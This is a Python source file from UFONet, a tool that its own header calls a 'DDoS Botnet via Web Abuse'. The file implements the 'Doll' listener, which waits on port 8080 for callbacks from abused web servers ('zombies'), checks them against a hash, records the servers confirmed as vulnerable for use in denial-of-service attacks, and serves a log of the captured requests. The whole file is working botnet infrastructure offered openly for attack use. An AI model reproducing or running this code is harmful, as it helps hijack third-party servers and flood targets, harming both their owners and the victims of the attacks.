doll.py 4.3 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. """
  4. UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
  5. You should have received a copy of the GNU General Public License along
  6. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  8. """
  9. from threading import Thread
  10. import socket, time, os, base64, re, urlparse
  11. class Needle(Thread):
  12. def __init__(self, client, addr, parent):
  13. Thread.__init__(self)
  14. self.daemon = True
  15. self.client = client
  16. self.parent = parent
  17. def run(self):
  18. data = self.client.recv(1024)
  19. if data:
  20. if data.startswith("HEAD"):
  21. self.parent.data_arrived(data)
  22. self.client.send("""HTTP/1.1 200 OK
  23. Server: UFONet Galactic Cyber Warfare
  24. Date: Wed, 05 Nov 2042 16:21:23 GMT
  25. Content-Type: text/html
  26. Content-Length: """+str(len('thanks for coming!'))+"""
  27. Connection: close
  28. """)
  29. self.client.close()
  30. else:
  31. self.parent.data_arrived(data)
  32. self.client.send('Welcome to UFONet mothership! ;-)\n')
  33. self.client.send('='*40)
  34. self.client.send("\n\nStream:\n")
  35. self.client.send('-'*15 + "\n\n")
  36. f = open("mothership", 'r') # read mothership stream
  37. self.client.send(str(f.read()))
  38. f.close()
  39. self.client.close()
  40. self.parent.client_finished(self)
  41. class Doll(Thread):
  42. def __init__(self, parent):
  43. Thread.__init__(self)
  44. self.daemon = True
  45. self._clients = []
  46. self._armed = True
  47. self.ready = False
  48. self.running =False
  49. self.parent = parent
  50. self.real_zombies = [] # 100% vulnerable zombies
  51. if os.path.exists('mothership') == True:
  52. os.remove('mothership') # remove mothership stream
  53. with open('alien') as f: # call alien to verify vulnerability
  54. self.alien = f.read().splitlines()
  55. f.close()
  56. def data_arrived(self, data):
  57. data.split("\n")[0]
  58. self.check_zombie(data)
  59. f = open("mothership", 'a') # append data mothership stream
  60. f.write(data)
  61. f.close()
  62. def check_zombie(self, data): # check for requests received by a zombie
  63. if str(''.join(self.alien)) in data: # hash check
  64. if "%7C" in data: # %7C -> |
  65. regex_zmb = re.compile('{}(.*){}'.format(re.escape('%7C'), re.escape(' HTTP'))) # regex magics
  66. else:
  67. regex_zmb = re.compile('{}(.*){}'.format(re.escape('|'), re.escape(' HTTP'))) # regex magics
  68. pattern_zmb = re.compile(regex_zmb)
  69. zombie_vul = re.findall(pattern_zmb, data)
  70. if zombie_vul not in self.real_zombies: # add zombies only one time
  71. self.real_zombies.append(zombie_vul)
  72. def client_finished(self, _thread):
  73. self._clients.remove(_thread)
  74. def shutdown(self):
  75. if self.ready:
  76. self.socket.shutdown(socket.SHUT_RDWR)
  77. self.socket.close()
  78. self.running = False
  79. self._armed = False
  80. self.ready = False
  81. def run(self):
  82. while not self.running and self._armed:
  83. try:
  84. s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
  85. s.bind(('', 8080))
  86. self.running = True
  87. except socket.error as e:
  88. print("\n[Warning] Doll socket busy, retry opening")
  89. if e.errno == 98: # if is in use wait a bit and retry
  90. time.sleep(3)
  91. else:
  92. return
  93. if not self._armed:
  94. print "\n[Error] Doll not armed"
  95. return
  96. self.socket = s
  97. self.ready = True
  98. s.listen(1)
  99. while self.running and self._armed:
  100. try:
  101. conn, addr = s.accept()
  102. except socket.timeout:
  103. print("\n[Warning] Socket is giving timeout...")
  104. pass
  105. except socket.error, e:
  106. if self.ready == False:
  107. return
  108. else:
  109. break
  110. else:
  111. t = Needle(conn, addr, self)
  112. t.start()
  113. self._clients.append(t)
  114. if self.ready:
  115. s.close()
  116. self.ready = False